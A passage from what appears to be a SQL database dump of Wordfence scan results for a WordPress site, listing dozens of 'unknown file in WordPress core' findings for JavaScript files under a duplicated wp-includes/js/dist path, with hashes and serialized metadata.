wp-includes/wp-includes/js/dist/blob.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/dist/blob.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77531,1675048834,1675048834,'new','knownfile',75,'8bcb03a9699cf9329cef9b2d05fcbe8c','b2a0bdd2b1082dd8cedbb056cea676a4','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/blob.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/dist/blob.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77532,1675048834,1675048834,'new','knownfile',75,'556b38ad6abd38769d221333130a5260','fdb51f16c8a4af91c3e0f085b5c3df3b','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/block-directory.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/dist/block-directory.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77533,1675048834,1675048834,'new','knownfile',75,'83c6ad87a36f32f3d21d93c93f4c9703','6965237c9ff5e58a6298015cd88d3e8b','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/block-directory.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/dist/block-directory.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77534,1675048834,1675048834,'new','knownfile',75,'7d10032d4289616ae411672101b9f916','6a14b8f577063e6e47a1f453fdf469d1','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/block-editor.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/dist/block-editor.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77535,1675048834,1675048834,'new','knownfile',75,'968789757a39fe97fa34e4be46212bf9','5c325b69f0c08ec55c739ccb5d452767','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/block-editor.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/dist/block-editor.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77536,1675048834,1675048834,'new','knownfile',75,'cd32be0bf5b60669934a1f97ff60d3fb','7f6f6f04f2a13bd45e46f49684e98fd3','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/block-library.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/block-library.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77537,1675048834,1675048834,'new','knownfile',75,'2307e3616921b62b490a2ecba0ff9908','a4ef2190ff6571ee4baf74ab6cfa1e59','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/block-library.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/dist/block-library.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77538,1675048835,1675048835,'new','knownfile',75,'4434c8286d136ca83fe35ba3bcdcfc6d','63c075b3714b76c594b15992f3d7140f','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/block-serialization-default-parser.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/js/dist/block-serialization-default-parser.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77539,1675048835,1675048835,'new','knownfile',75,'f3c4402582f3e18bef19b4f9def77b83','8822431d83c10d68375fcf27dca1ae3b','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/block-serialization-default-parser.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/js/dist/block-serialization-default-parser.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77540,1675048835,1675048835,'new','knownfile',75,'bc3eee49098f854cac0545d2c2782553','88d310484b1735f97e95dba3b79cda6b','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/blocks.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/dist/blocks.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77541,1675048835,1675048835,'new','knownfile',75,'405bef7d8f15efc858d4213557490588','aea8a9af3134180a6dd4ddf84878aa0d','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/blocks.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/dist/blocks.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77542,1675048835,1675048835,'new','knownfile',75,'9581d97c7cbcb4a36662034bfda703cf','053e66933189655f32f9cf615fb601c5','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/components.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/dist/components.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77543,1675048835,1675048835,'new','knownfile',75,'8237375422ab04a4cc4f7bcab8e4e51c','713828c51b5d0e6807c599847b11e45f','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/components.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/dist/components.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77544,1675048835,1675048835,'new','knownfile',75,'2496ed2c0075859d955b9beae7be2b82','93514db8812a23f2526e628fdd044260','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/compose.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/dist/compose.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77545,1675048835,1675048835,'new','knownfile',75,'7916ea9655d68a8b199bd71dfaa0b689','55545ad42a61f5c79099ced9bdafe3fa','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/compose.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/dist/compose.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77546,1675048835,1675048835,'new','knownfile',75,'e9aa41ef07bdc96624bd1cd90c530b4d','8a60229a2a2599429d176c8ab2bd6aca','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/core-data.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/dist/core-data.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77547,1675048835,1675048835,'new','knownfile',75,'40793d5d5edcc8d7c901183a4cf17ea5','dfce9701ec930fb5eb9d368204284469','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/core-data.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/core-data.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77548,1675048835,1675048835,'new','knownfile',75,'a09d4814bffd4cf46e73b7149a4a0db6','70781a603bbb74ed876dd6b419238970','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/data-controls.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/data-controls.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77549,1675048835,1675048835,'new','knownfile',75,'811e184162d526c5836e1c62cbfddb8f','25626874aa4e6d2e82ba218912fd7ac1','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/data-controls.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/dist/data-controls.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77550,1675048835,1675048835,'new','knownfile',75,'2e523f1f25b69d991effc154b1dcaacd','c17c05cb35ee5382e384503f9e33b6fb','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/data.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/dist/data.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77551,1675048835,1675048835,'new','knownfile',75,'6a92c3bb7a5f6435bf42c95ef1a59e0a','56693db31b014781e49f23959d88a6da','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/data.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/dist/data.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77552,1675048835,1675048835,'new','knownfile',75,'4e18b0c7e529339cf8157cc8ce2a2d76','07e887305436c7375f14a23e2ee395ba','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/date.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/dist/date.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77553,1675048835,1675048835,'new','knownfile',75,'6b9b0e76e3cbe8dbf6e6698c86f69c9b','fa2431ddd60046804346b4bd1015086f','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/date.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/dist/date.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77554,1675048836,1675048836,'new','knownfile',75,'2de47da35d70b7788d2a1b1e0329ce1b','f4b00c30d5dbbe8931ee7e9f2665142c','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/deprecated.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/dist/deprecated.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77555,1675048836,1675048836,'new','knownfile',75,'4e04e3b56f87dcb1aace3178855ce247','affd60633b492e51e7e0bbc415746e36','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/deprecated.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/dist/deprecated.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77556,1675048836,1675048836,'new','knownfile',75,'d4fa27e7d3d59596de0779487d053ba6','0f3d82d4b1a2214ce971a9c5bc092678','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/dom-ready.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/dist/dom-ready.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77557,1675048836,1675048836,'new','knownfile',75,'54c189fd2f71169bf094263a70d968a8','58ceec494bd885d681377d83ee03498f','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/dom-ready.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/dom-ready.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77558,1675048836,1675048836,'new','knownfile',75,'270b6e806d014e423db8a536a6231a28','9f8672503b95389f52ada339b8c16195','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/dom.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/dist/dom.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77559,1675048836,1675048836,'new','knownfile',75,'480862efaac173c94ee508b4961413eb','6a641f11f178e3b26c3113f3aa8660a1','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/dom.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/dist/dom.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77560,1675048836,1675048836,'new','knownfile',75,'75765108bcda4f95443358ee0f91f6df','2f6e06d249199404838243c4b07ca2d3','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/edit-post.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/dist/edit-post.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77561,1675048836,1675048836,'new','knownfile',75,'35fd7bbea6723792a4b5465d92a491b7','4eb5f9fa71eb921ddd4aae6f104d6716','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/edit-post.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/edit-post.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77562,1675048836,1675048836,'new','knownfile',75,'715cb16a39f300a10c9cf5ff1639ff52','d16491d60a2d92c81501dc1063600149','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/editor.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/dist/editor.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77563,1675048836,1675048836,'new','knownfile',75,'8869314f6d39e322c587f105f7e5fcb2','b8e1ec6c70179c66d038bcf38ea89494','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/editor.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/dist/editor.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77564,1675048836,1675048836,'new','knownfile',75,'0511835fb36b36eea46c3bf130fc7362','b86f89fb1cecb1fca1fb1c88d35c7a04','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/element.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/dist/element.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77565,1675048836,1675048836,'new','knownfile',75,'bd1999d575649642f9712830cd295991','522d4ac5e742a0c39a6c1529710d267e','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/element.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/dist/element.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77566,1675048836,1675048836,'new','knownfile',75,'8b4d1e19e7ce71af6b5186849d91a022','2789df24d84861993863439998401f20','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/escape-html.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/dist/escape-html.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77567,1675048836,1675048836,'new','knownfile',75,'b64a22f263137018bd5a212d65525f70','2573593b4fa3eff721cfb2cb79732c3b','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/escape-html.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new 